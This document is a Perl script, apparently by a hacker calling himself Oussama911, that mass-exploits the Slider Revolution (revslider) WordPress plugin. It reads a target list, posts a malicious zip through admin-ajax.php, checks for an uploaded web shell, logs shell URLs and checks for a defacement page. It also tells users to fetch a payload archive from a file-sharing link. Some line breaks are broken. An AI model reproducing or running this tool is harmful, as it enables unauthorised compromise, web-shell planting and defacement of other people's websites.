#!

/usr/bin/perl
#
# Don't Change right Noobs Oky #Oussama911 :3
# +-----------------------------------------------------------------------------------------------+
# | Warning : Download This Archive .zip and past in folder Bin of Perl for Us
e this Script !!!! |
# | Link : http://www.gulfup.com/?3bDGf4 !!!!
|
# |
|
# +-----------------------------------------------------------------------------------------------+
#
# -> Title: Auto Exploiter Slider Revolution Shell Upload
# -> Author: Oussama911
#
use LWP::UserAgent;
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
head();
my $usage = " \nperl $0 <list.txt>\n perl $0 lista.txt";
die "$usage" unless $ARGV[0];
open(tarrget,"<$ARGV[0]") or die "$!";
while(<tarrget>){
chomp($_);
$target = $_;
my $path = "wp-admin/admin-ajax.php";
print "\nTarget => $target\n";
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Geck
o) Chrome/26.0.1410.63 Safari/537.31");
my $req = $ua->get("$target/$path");
if($req->is_success) {
print "\n [+] Xploit Possibility Work :3\n \n";

print " [*] Try Exploiting Vulnerability\n";

print " [*] Xploiting $target\n";
my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-dat
a", Content => [action => "revslider_ajax_action", client_action => "update_plug
in", update_file => ["revslider.zip"]]);
print " [*] Sent payload\n";
if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print " [+] Payload successfully executed\n";
print " [*] Checking if shell was uploaded\n";
my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/r

evslider/up.php")->content;
if($check =~/<br>/) {
print " [+] Shell successfully uploaded\n";
open(save, '>>Shells.txt');
print save "shell : $target/wp-content/plugins/revslider/temp/update_extract
/revslider/up.php?zeb\n";
close(save);
print " [*] Checking if Deface was uploaded now\n";
my $def = $ua->get("$target/leet.html")->content;
if($def = ~/Hacked/) {
print " [+] Deface uploaded successfull\n";
} else {print " [-] Deface not Uploaded :/"; }
} else { print " [-] I'think Shell Not Uploaded :/\n"; }
} else {
print " [-] Payload failed: Fail\n";
print "\n";
}
} else { print "\n [-]Xploit Fail \n"}
sub head {
print "\t
print "\t
print "\t
print "\t
}
}

+===============================================\n";
| Auto Exploiter Revslider Shell Upload \n";
| Author: Oussama911\n";
+===============================================\n";